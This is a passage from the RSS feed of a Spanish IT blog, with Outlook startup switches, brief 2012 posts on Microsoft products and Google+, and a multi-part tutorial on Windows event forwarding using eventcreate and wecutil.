duplicados.</td><td></td></tr><tr><td height="40">/cleansubscriptions</td><td width="500">Elimina los mensajes de suscripción y las propiedades de las funciones de suscripción.</td><td></td></tr><tr><td height="40">/cleanviews</td><td width="500">Restablece las vistas predeterminadas. Todas las vistas personalizadas creadas se pierden.</td><td></td></tr><tr><td height="40">/designer</td><td width="500">Inicia Outlook sin detectar si debería ser el cliente predeterminado la primera vez que se ejecuta.</td><td></td></tr><tr><td height="20"><br /><div>/firstrun</div></td><td width="500">Inicia Outlook como si se ejecutase por primera vez.</td><td></td></tr><tr><td height="60">/importprf nombrearchivoprf</td><td width="500">Inicia Outlook y abre o importa el perfil MAPI definido (*.prf). Si Outlook ya está abierto, pone en la cola el perfil que se va a importar en el próximo inicio limpio.</td><td></td></tr><tr><td height="40">/nocustomize</td><td width="500">Inicia Outlook sin cargar los archivos outcmd.dat (barras de herramientas personalizadas) y *.fav.</td><td></td></tr><tr><td height="40">/noextensions</td><td width="500">Inicia Outlook con las extensiones desactivadas pero incluidas en la lista Complementos.</td><td></td></tr><tr><td height="20">/nopollmail</td><td width="500">Inicia Outlook sin comprobar si hay correo electrónico.</td><td></td></tr><tr><td height="20">/nopreview</td><td width="500">Inicia Outlook con el Panel de lectura desactivado.</td><td></td></tr><tr><td height="40">/profile nombreperfil</td><td width="500">Carga el perfil especificado. Si el perfil contiene un espacio, escríbalo entre comillas (&quot;).</td><td></td></tr><tr><td height="40">/profiles</td><td width="500">Abre el cuadro de diálogo Elegir perfil sin tener en cuenta la configuración de las Opciones del menú Herramientas.</td><td></td></tr><tr><td height="40">/recycle</td><td width="500">Inicia Outlook utilizando una ventana de Outlook existente. Se usa junto con /explorer o /folder.</td><td></td></tr><tr><td height="220">/remigratecategories</td><td width="500">Inicia Outlook y ejecuta los siguientes comandos en el buzón predeterminado:<br />Actualiza las marcas Para seguimiento multicolor a categorías coloreadas de Office Outlook 2007.<br />Actualiza las etiquetas de calendario a categorías coloreadas de Office Outlook 2007.<br />Agrega todas las categorías utilizadas en elementos que no son de correo a la Lista principal de categorías.Nota Es el mismo comando que Actualizar a categorías de color en cada cuadro de diálogo de propiedades de buzón de Outlook.</td><td>Outlook 2007, 2010</td></tr><tr><td height="180">/resetfoldernames</td><td width="500">Restablecer los nombres de las carpetas predeterminadas (como Bandeja de entrada o Elementos enviados) a sus nombres predeterminados en el idioma actual de la interfaz de usuario de Office. Por ejemplo, si se conecta por primera vez al buzón de Outlook utilizando una interfaz de usuario en Ruso, no se podrán cambiar los nombres de las carpetas predeterminadas del Ruso a otro idioma como el Japonés o el Inglés. Puede utilizar este modificador para restablecer los nombres de las carpetas predeterminadas después de cambiar el idioma de la interfaz de usuario o instalar una versión de Outlook en otro idioma</td><td></td></tr><tr><td height="40">/resetformregions</td><td width="500">Vacía la caché de áreas de formulario y carga de nuevo las definiciones de área de formulario del registro de Windows.</td><td>Outlook 2007, 2010</td></tr><tr><td height="20">/resetfolders</td><td width="500">Restablece las carpetas que faltan en la ubicación de envío predeterminada.</td><td></td></tr><tr><td height="20">/resetnavpane</td><td width="500">Borra y vuelve a crear el Panel de exploración del perfil actual.</td><td></td></tr><tr><td height="40">/resetsearchcriteria</td><td width="500">Reinicia todos los criterios de búsqueda automática de modo que en cada módulo se muestre el conjunto de criterios predeterminado.</td><td>Outlook 2007, 2010</td></tr><tr><td height="20">/resetsharedfolders</td><td width="500">Quita todas las carpetas compartidas del panel de exploración.</td><td>Outlook 2007, 2010</td></tr><tr><td height="60">/resettodobar</td><td width="500">Borra y regenera la lista de la barra Tareas pendientes para el perfil actual. La carpeta de búsqueda de la barra Tareas pendientes se elimina y se crea de nuevo.</td><td>Outlook 2007, 2010</td></tr><tr><td height="40">/restore</td><td width="500">Intenta abrir el mismo perfil y las mismas carpetas que estaban abiertas antes de que Outlook se cerrara anormalmente.</td><td>Outlook 2010</td></tr><tr><td height="40">/rpcdiag</td><td width="500">Abre Outlook y muestra el cuadro de diálogo del estado de la conexión de la llamada al procedimiento remoto (RPC).</td><td></td></tr><tr><td height="40">/safe</td><td width="500">Inicia Outlook sin extensiones, sin Panel de lectura y sin personalización de barras de herramientas.</td><td></td></tr><tr><td height="20">/safe:1</td><td width="500">Inicia Outlook con el Panel de lectura desactivado.</td><td></td></tr><tr><td height="20">/safe:2</td><td width="500">Inicia Outlook sin comprobar si hay correo electrónico.</td><td>Outlook 2003</td></tr><tr><td height="40">/safe:3</td><td width="500">Inicia Outlook con las extensiones desactivadas pero incluidas en la lista Complementos.</td><td></td></tr><tr><td height="40">/safe:4</td><td width="500">Inicia Outlook sin cargar los archivos outcmd.dat (barras de herramientas personalizadas) y *.fav.</td><td></td></tr><tr><td height="40">/sniff</td><td width="500">Inicia Outlook y fuerza la detección de nuevas convocatorias de reunión en la Bandeja de entrada, y después las agrega al calendario.</td><td></td></tr></tbody></table><br />Basado en el documento original publicado el 13 de abril de 2012 por Oz Casey, Dedeal en el blog <em>smtp25</em> en <a href="http://smtp25.blogspot.com.es/2012/04/useful-outlook-switches-you-need-to.html"><a href="http://smtp25.blogspot.com.es/2012/04/useful-outlook-switches-you-need-to.html">http://smtp25.blogspot.com.es/2012/04/useful-outlook-switches-you-need-to.html</a></a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>La nueva interfaz de Google&#43;</title>
      <link>https://www.igalvan.es/posts/la-nueva-interfaz-de-google_11/</link>
      <pubDate>Wed, 11 Apr 2012 21:26:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/la-nueva-interfaz-de-google_11/</guid>
      <description><![CDATA[<p>No soy de los que suele hablar bien de los productos de <em>Google</em>, de hecho creo que el único que siempre me ha gustado es <em>Google+</em>. <em>Y hablando de Google+</em>, hoy me he quedado bastante impresionado cuando he entrado en su página y he visto la nueva interfaz que han creado los chicos de <em>Mountain View</em>. Esta vez se han lucido con una interfaz muy sencilla, intuitiva y visualmente atractiva.<br/><p><a name='more'></a>Entre las novedades que tiene la nueva interfaz me ha gustado mucho la disposición de las entradas de los usuarios y la facilidad para publicar imágenes y vídeos. Como no me gusta ser zalamero, os invito a que entréis en vuestro perfil y lo comprobéis por vosotros mismos, y de paso os dejo este <a href="http://www.youtube.com/watch?v=A3Atj57r15U&feature=player_embedded" target="_blank">vídeo promocional</a> que ha hecho la propia gente de <em>Google</em>.</p>]]></description>
      
    </item>
    
    
    
    <item>
      <title>Y el tiempo se acaba... para Windows XP y Office 2003, ¡ya era hora!</title>
      <link>https://www.igalvan.es/posts/y-el-tiempo-se-acaba-para-windows-xp-y_10/</link>
      <pubDate>Tue, 10 Apr 2012 21:52:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/y-el-tiempo-se-acaba-para-windows-xp-y_10/</guid>
      <description><![CDATA[<p>Si en 2005 me hubieran dicho que Windows XP sería el sistema operativo más utilizado en 2012 hubiera dicho que están locos, pero a fecha de hoy también me hubiera tenidoq ue tragar mis palabras.<br/><br/>Llendo al grano, Microsoft ha publicado una web recordandonos que el soporte para Windows XP y Office 2003 tiene fecha de caducidad anunciada, el 8 de abril de 2012 y que tenemos que actulizarnos, y preferiblemente a Windows 7, bueno, dentro de pocos meses nos diran que a Windows 8, o al menos eso espero yo.<br/><br/>Os dejo el enlace de la <a href="http://www.microsoft.com/en-us/windows/endofsupport.aspx" target="_blank">página</a> que han publicado para que le echeis un vistazo.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Sexismo lingüístico y visibilidad de la mujer</title>
      <link>https://www.igalvan.es/posts/sexismo-linguistico-y-visibilidad-de-la_4/</link>
      <pubDate>Sun, 04 Mar 2012 15:51:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/sexismo-linguistico-y-visibilidad-de-la_4/</guid>
      <description><![CDATA[<p>No suelo publicar esta clase de entradas en mi blog pero esta vez no he podido resistirme ante un texto tan exquisito. Esta nueva moda de crear una nueva gramatica no sexista para nuestro idioma se trata de un tema que siempre es polemico, y es que en muchas ocasiones los politicos no deberían intervenir ni forzar a la sociedad a aceptar ciertas situaciones que van <em>contra natura</em>.<br/><br/>Os dejo el <a href="http://www.rae.es/rae/gestores/gespub000040.nsf/(voanexos)/arch50C5BAE6B25C8BC8C12579B600755DB9/$FILE/Sexismo_linguistico_y_visibilidad_de_la_mujer.pdf">enlace al informe</a> generado por Ignacio Bosque al respecto.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Webcast Windows Azure para profesionales IT</title>
      <link>https://www.igalvan.es/posts/webcast-windows-azure-para_4728/</link>
      <pubDate>Mon, 06 Feb 2012 12:30:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/webcast-windows-azure-para_4728/</guid>
      <description><![CDATA[<p>Hoy os traigo simplemente un apunte de una serie de dos webcasts que van a impartir los dos mayores expertos de este país en esta materia que son Paulo Dias (Evangelista de <em>Microsoft</em>) e Ibon Landa (MVP <em>Windows</em> <em>Azure</em>). Serán los días 9 y 16 de febrero de 2012. Os dejos los enlaces para que os apunteís.<br/><br/><a href="http://blogs.itpro.es/eventos/2012/01/18/windows-azure-para-itprosparte-1/"><a href="http://blogs.itpro.es/eventos/2012/01/18/windows-azure-para-itprosparte-1/">http://blogs.itpro.es/eventos/2012/01/18/windows-azure-para-itprosparte-1/</a></a><br/><a href="http://blogs.itpro.es/eventos/2012/02/02/windows-azure-para-itprosparte-2/"><a href="http://blogs.itpro.es/eventos/2012/02/02/windows-azure-para-itprosparte-2/">http://blogs.itpro.es/eventos/2012/02/02/windows-azure-para-itprosparte-2/</a></a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Informe comparativa alternativas virtualización</title>
      <link>https://www.igalvan.es/posts/informe-comparativa-alternativas_8200/</link>
      <pubDate>Sun, 05 Feb 2012 09:28:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/informe-comparativa-alternativas_8200/</guid>
      <description><![CDATA[<p>Un compañero del trabajo ha realizado un excelente documento comparando varias alternativas de virtualización de código abierto para demostrar que hay más vida después de <em>Microsoft</em>, <em>VMWare</em> y <em>Citrix</em>.<br/><br/>No me voy a explayar mucho porque lo realmente importante es que leáis el documento por vosotros mismos, así que me voy a limitar a dejaros una referencia al <a href="http://hdl.handle.net/10609/8185" target="_blank">trabajo de comparativa</a> que realizó mi compañero y que juzguéis por vosotros mismos. Yo por mi parte ya estoy probando <em>Xen Cloud Platform</em> y espero escribir mi opinión acerca de este producto en breve.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Exchange 2007 SP3 Update Rollup 6</title>
      <link>https://www.igalvan.es/posts/exchange-2007-sp3-update-rollup-6_7654/</link>
      <pubDate>Thu, 02 Feb 2012 12:30:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/exchange-2007-sp3-update-rollup-6_7654/</guid>
      <description><![CDATA[<!--:es-->Lo que va de año 2.012 está viniendo cargado de actualizaciones para casi todos los productos de <em>Microsoft</em>. En este caso le toca a <em>Microsoft Exchange Server 2007</em>, ya está disponible el&nbsp;<em>Update Rollup</em>&nbsp;6 del <em>Service Pack</em> 3. Si quereis ver la lista completa, y no son pocos, de cambios se encuentra disponible en el <a href="http://support.microsoft.com/?kbid=2608656" target="_blank">KB2608656</a>.<br /><br />Recordad que para poder instalar este paquete acumulativo&nbsp;teneís que tener previamente instalado el <em>Service Pack 3</em> de <em>Exchange 2007</em> porque de otra manera no podreís actualizarlo.<br /><br />Por cierto, para realizar su descarga en español teneís que seguir este <a href="http://www.microsoft.com/downloads/es-es/details.aspx?familyid=cc970d23-df23-4915-91b8-d26af632d9fd&amp;displaylang=es" target="_blank">enlace</a>.<br /><!--:-->]]></description>
      
    </item>
    
    
    
    <item>
      <title>Formación en línea nubes privadas con System Center 2012</title>
      <link>https://www.igalvan.es/posts/formacion-en-linea-nubes-privadas-con_6426/</link>
      <pubDate>Wed, 01 Feb 2012 12:30:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/formacion-en-linea-nubes-privadas-con_6426/</guid>
      <description><![CDATA[<p>Hoy os traigo una buena noticia, Scott Schnoll va a realizar un evento de formación en línea sobre nubes privadas con <em>System Center 2012</em> con una duración de dos días totalmente gratis los días 21 y 22 de febrero de 2012. Este tipo de oportunidades hay que aprovecharlas, así que no tardéis en apuntaros y para facilitaros la tarea aquí tenéis siguiente enlace directo para inscribiros <a href="http://mctreadiness.com/MicrosoftCareerConferenceRegistration.aspx?pid=298"><a href="http://mctreadiness.com/MicrosoftCareerConferenceRegistration.aspx?pid=298">http://mctreadiness.com/MicrosoftCareerConferenceRegistration.aspx?pid=298</a></a><br/><br/><a name='more'></a><br/><br/>La agenda prevista es la siguiente:<br/><br/>Día 1: Despliegue y configuración<br/><ul><br/>	<li>Parte 1: Entendiendo<em> Microsoft Private Cloud</em>.</li><br/>	<li>Parte 2: Desplegando los componentes de infraestructura.</li><br/>	<li>Parte 3: Desplegando la infraestructura de nube privada.</li><br/>	<li>Parte 4: Desplegando la capa de servicios.</li><br/>	<li>Parte 5: Desplegando las aplicaciones y las máquinas virtuales.</li><br/></ul><br/>Día 2: Administración y operaciones<br/><ul><br/>	<li>Parte 6: Administrando los componentes de infraestructura.</li><br/>	<li>Parte 7: Administrando la infraestructura de nube privada.</li><br/>	<li>Parte 8: Administrando la capa de servicios.</li><br/>	<li>Parte 9: Administrando las aplicaciones y las máquinas virtuales.</li><br/></ul></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Reenvío y recopilación de eventos (y III)</title>
      <link>https://www.igalvan.es/posts/reenvio-y-recopilacion-de-eventos-y-iii_2045/</link>
      <pubDate>Mon, 30 Jan 2012 12:30:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/reenvio-y-recopilacion-de-eventos-y-iii_2045/</guid>
      <description><![CDATA[<div style="text-align: justify;">Esta es la tercera y última parte de este artículo sobre cómo realizar el reenvío y recopilación de eventos de&nbsp;un equipo <em>Windows</em>, la primera parte se puede localizar en este <a href="http://www.igalvit.es/2012/01/reenvio-y-recopilacion-de-eventos-i.html" target="_blank">enlace</a> y la segunta en este otro <a href="http://www.igalvit.es/2012/01/reenvio-y-recopilacion-de-eventos-ii.html" target="_blank">enlace</a>.</div><div style="text-align: justify;"></div><a name='more'></a><br /><div style="text-align: justify;">En las dos anteriores partes he indicado cómo configurar&nbsp;el equipo de origen para que acepten las&nbsp;peticiones de Administración remota de <em>Windows </em>(<em>WinRM</em>) y cómo configurar el equipo recopilador para añadirle una suscripción de evento del equipo de origen.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">En esta tercera parte voy a comprobar que todo el conjunto funciona correctamente generando un evento manual y verificando que se muestra correctamente en la suscripción.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">El primer paso es generar un evento de forma manual mediante el comando eventcreate desde la consola de simbolo de sistema. El comando completo que he usado para este artículo es <span style="background-color: #cccccc; font-family: &quot;Courier New&quot;, Courier, monospace;">eventcreate /ID 50 /L System /SO igalvit.es /T Error /D "Generando un error de prueba."</span> tal y cómo se muestra en la siguiente figura.</div><div style="text-align: justify;"><br /></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://3.bp.blogspot.com/-IATDhkC4cic/TyUzGk2BK8I/AAAAAAAABCE/ocrstBCZiSs/s1600/evento_generar.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="197" src="http://3.bp.blogspot.com/-IATDhkC4cic/TyUzGk2BK8I/AAAAAAAABCE/ocrstBCZiSs/s400/evento_generar.png" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><em><strong>Ilustración 1.</strong> Generación de un evento de forma manual</em></td></tr></tbody></table><div class="separator" style="clear: both; text-align: justify;">&nbsp;El segundo paso es comprobar que en el equipo recopilador que se ha recibido el evento generado en el equipo de origen. Para comprobarlo simplemente es necesario abrir el visor de eventos de este segundo equipo para comprobar en la carpeta Eventos reenviados si aparece el registro del evento mencionado tal&nbsp;y cómo se muestra en las siguientes dos figuras.</div><div style="text-align: left;"><br /></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://4.bp.blogspot.com/-Q54N5Uk4f8g/TyU1aRNBz-I/AAAAAAAABCM/laHyPIJysCs/s1600/evento_generar_2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="217" src="http://4.bp.blogspot.com/-Q54N5Uk4f8g/TyU1aRNBz-I/AAAAAAAABCM/laHyPIJysCs/s400/evento_generar_2.png" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><em><strong>Ilustración 2.</strong> Verificación del evento generado en el equipo recopilador</em></td></tr></tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://1.bp.blogspot.com/-ftB5u7J3_8I/TyU2hRCzatI/AAAAAAAABCU/GNY0RXMRc48/s1600/evento_generar_3.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="277" src="http://1.bp.blogspot.com/-ftB5u7J3_8I/TyU2hRCzatI/AAAAAAAABCU/GNY0RXMRc48/s400/evento_generar_3.png" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><em><strong>Ilustración 3.</strong> Detalles del evento generado manualmente</em></td></tr></tbody></table><div class="separator" style="clear: both; text-align: justify;">Por último y para dar por terminado este artículo os indico un par de enlaces que sirven para profundizar en los conceptos que he estado mostrando estos días.﻿</div><div class="separator" style="clear: both; text-align: left;"><br /></div><div><span style="-webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; -webkit-text-decorations-in-effect: none; -webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; border-collapse: separate; color: black; letter-spacing: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><a href="http://technet.microsoft.com/es-es/library/cc748890.aspx">http://technet.microsoft.com/es-es/library/cc748890.aspx</a></span></div><div><span style="-webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; -webkit-text-decorations-in-effect: none; -webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; border-collapse: separate; color: black; letter-spacing: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"></span>&nbsp;</div><div><span style="-webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; -webkit-text-decorations-in-effect: none; -webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; border-collapse: separate; color: black; letter-spacing: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><a href="http://technet.microsoft.com/en-us/library/cc749183.aspx">http://technet.microsoft.com/en-us/library/cc749183.aspx</a></span></div><div><span style="-webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; -webkit-text-decorations-in-effect: none; -webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; border-collapse: separate; color: black; letter-spacing: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"></span>&nbsp;</div><div><span style="-webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; -webkit-text-decorations-in-effect: none; -webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; border-collapse: separate; color: black; letter-spacing: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"></span>&nbsp;</div><div class="separator" style="clear: both; text-align: left;">  </div><div class="separator" style="clear: both; text-align: center;"><br /></div><div align="left" style="text-align: justify;"><br /></div><div align="left" style="text-align: justify;">﻿</div>]]></description>
      
    </item>
    
    
    
    <item>
      <title>Reenvío y recopilación de eventos (II)</title>
      <link>https://www.igalvan.es/posts/reenvio-y-recopilacion-de-eventos-ii_5580/</link>
      <pubDate>Sun, 29 Jan 2012 12:30:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/reenvio-y-recopilacion-de-eventos-ii_5580/</guid>
      <description><![CDATA[<div style="text-align: justify;">Continuo con la segunda parte de este artículo sobre cómo realizar el reenvío y la recopilación de los eventos de un equipo <em>Windows</em>, la primera parte se puede localizar en este <a href="http://www.igalvit.es/2012/01/reenvio-y-recopilacion-de-eventos-i.html" target="_blank">enlace</a>.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">En la anterior parte mostré como configurar el equipo de origen para permitir las peticiones de Administración remota de <em>Windows</em> (<em>WinRM</em>)&nbsp;y en este segunda parte mostraré cómo configurar el equipo recopilador.</div><a name='more'></a><div style="text-align: justify;">El primer paso es configurar la utilidad del colector de eventos de <em>Windows</em> (<em>Wecutil</em>) en el equipo recopilador para permitir su ejecución. En el caso de este tutorial utilizaré el modo de configuración rápida, pero al igual que siempre indico este no es el método más recomendado para un sistema en producción.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Para realizar este paso se debe ejecutar el comando <span style="background-color: #cccccc; font-family: &quot;Courier New&quot;, Courier, monospace;">wecutil qc</span> desde una consola de simbolo de sistema con privilegios tal y como se muestra en la siguiente figura.</div><div style="text-align: justify;"><br /></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://3.bp.blogspot.com/-oNeAYnhNqr4/TyPrqyKkzkI/AAAAAAAABAc/IZxnsQcFMjE/s1600/wecutil_config.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="195" src="http://3.bp.blogspot.com/-oNeAYnhNqr4/TyPrqyKkzkI/AAAAAAAABAc/IZxnsQcFMjE/s400/wecutil_config.png" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><em><strong>Ilustración 1.</strong> Ejecución del comando wecutil</em></td></tr></tbody></table><div class="separator" style="clear: both; text-align: justify;">El segundo paso es crear un suscripción a los eventos que se desea recibir del equipo origen, para ello se debe abrir la consola de visor de eventos y una vez se haya seleccionado la carpeta <em>Suscripciones</em> se deben hacer clic con el botón derecho del ratón y seleccionar la opción <em>Crear suscripción</em> tal y como se muestra en la siguiente figura.</div><div class="separator" style="clear: both; text-align: justify;"><br /></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://2.bp.blogspot.com/-11Ci9HHP3j0/TyUPg3iEKGI/AAAAAAAABAk/HdXJKBJDsYs/s1600/suscrip_config_1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="352" src="http://2.bp.blogspot.com/-11Ci9HHP3j0/TyUPg3iEKGI/AAAAAAAABAk/HdXJKBJDsYs/s400/suscrip_config_1.png" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><em><strong>Ilustración 2.</strong> Creación de una suscripción</em></td></tr></tbody></table><div class="separator" style="clear: both; text-align: justify;">Una vez se ha seleccionado la opción de <em>Crear suscripción</em> se abre una ventana de dialogo donde se pueden configurar todos los aspectos de la suscripción. Para este artículo se han configurado los aspectos que se muestras en la figura siguiente.</div><div class="separator" style="clear: both; text-align: justify;"><br /></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://1.bp.blogspot.com/-61m-HsScrAc/TyURoZ6sPhI/AAAAAAAABAs/eTfo3RbBP4M/s1600/suscrip_config_2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="330" src="http://1.bp.blogspot.com/-61m-HsScrAc/TyURoZ6sPhI/AAAAAAAABAs/eTfo3RbBP4M/s400/suscrip_config_2.png" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><em><strong>Ilustración 3.</strong>&nbsp; Propiedades de una suscripción</em></td></tr></tbody></table><div class="separator" style="clear: both; text-align: justify;">Los campos de <em>Nombre de suscripción</em> y <em>Descripción</em> son lo suficientemente autodescriptivos para no necesitar mayor explicación.</div><div class="separator" style="clear: both; text-align: justify;"><br /></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://1.bp.blogspot.com/-ZmYB79MkAiY/TyUolzoM9PI/AAAAAAAABB0/yD5WrS-uO-k/s1600/suscrip_partes_1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="62" src="http://1.bp.blogspot.com/-ZmYB79MkAiY/TyUolzoM9PI/AAAAAAAABB0/yD5WrS-uO-k/s400/suscrip_partes_1.png" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><em><strong>Ilustración 4.</strong> Nombre y descripción de la suscripción</em></td></tr></tbody></table><div class="separator" style="clear: both; text-align: justify;">El despleglable de <em>Registro de destino</em> permite seleccionar en qué archivo de registro se van a almacenar los eventos recopilados, en el caso de este artículo se ha dejado el valor por defecto que es el registro de <em>Eventos reenviados</em>.</div><div class="separator" style="clear: both; text-align: justify;"><br /></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://1.bp.blogspot.com/-0kNE6ox8PfU/TyUo4Xm6jzI/AAAAAAAABB8/R4yR0vWMXqs/s1600/suscrip_partes_2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="32" src="http://1.bp.blogspot.com/-0kNE6ox8PfU/TyUo4Xm6jzI/AAAAAAAABB8/R4yR0vWMXqs/s400/suscrip_partes_2.png" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><em><strong>Ilustración 5.</strong> Selección del regisotr de destino</em></td></tr></tbody></table><div class="separator" style="clear: both; text-align: justify;">En la tercera sección denominada <em>Tipo de suscripción y equipos de origen</em>, he seleccionado la opción más sencilla de configurar que es que sea el equipo recopilador el que proporcione la suscripción. Para ello es necesario seleccionar el botón de radio con el título <em>Iniciada por el recopilador</em> y hacer click sobre el botón <em>Seleccionar equipos...</em>. Una vez esto aparecerá un cuadro de dialogo dónde se permite localizar la cuenta en Directorio Activo del equipo de origen haciendo clic en el botón Agregar equipos de dominio tal y cómo muestra la siguiente secuencia de figuras.</div><div class="separator" style="clear: both; text-align: justify;"><br /></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://1.bp.blogspot.com/-741LBRh4PNg/TyUUbJ4eG1I/AAAAAAAABA0/u2zd8sf_miM/s1600/suscrip_config_3.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="242" src="http://1.bp.blogspot.com/-741LBRh4PNg/TyUUbJ4eG1I/AAAAAAAABA0/u2zd8sf_miM/s400/suscrip_config_3.png" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><em><strong>Ilustración 6.</strong> Adición de equipos de origen a la suscripción</em></td></tr></tbody></table><div class="separator" style="clear: both; text-align: center;">﻿</div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://3.bp.blogspot.com/-bY1hiY6H0_k/TyUU8y51STI/AAAAAAAABA8/QG_smhY-g6o/s1600/suscrip_config_4.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="201" src="http://3.bp.blogspot.com/-bY1hiY6H0_k/TyUU8y51STI/AAAAAAAABA8/QG_smhY-g6o/s400/suscrip_config_4.png" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><em><strong>Ilustración 7.</strong> Selección de equipo de origen</em></td></tr></tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://2.bp.blogspot.com/-C_DRyR5vMf0/TyUVmNDFANI/AAAAAAAABBE/9PGfVjoXdo0/s1600/suscrip_config_5.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="195" src="http://2.bp.blogspot.com/-C_DRyR5vMf0/TyUVmNDFANI/AAAAAAAABBE/9PGfVjoXdo0/s320/suscrip_config_5.png" width="320" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><em><strong>Ilustración 8.</strong> Ventana de equipos de origen añadidos</em></td></tr></tbody></table><div style="text-align: justify;">Una vez se ha añadido el equipo a la suscripción es deseable realizar una comprobación previa para asegurarse que el equipo de origen es accesible desde el equipo receptor. Para ello se debe hacer clic sobre el botón <em>Probar</em>.</div><div style="text-align: justify;"><br /></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://3.bp.blogspot.com/-krQ2r9E57FM/TyUWjJb4ASI/AAAAAAAABBM/WSOoarcyp4E/s1600/suscrip_config_6.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="243" src="http://3.bp.blogspot.com/-krQ2r9E57FM/TyUWjJb4ASI/AAAAAAAABBM/WSOoarcyp4E/s400/suscrip_config_6.png" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><em><strong>Ilustración 9.</strong> Prueba de conexión con el equipo origen</em></td></tr></tbody></table>Si las prueba es correcta se mostrará un mensaje como el de la siguiente figura.<br /><div style="text-align: justify;"><br /></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: 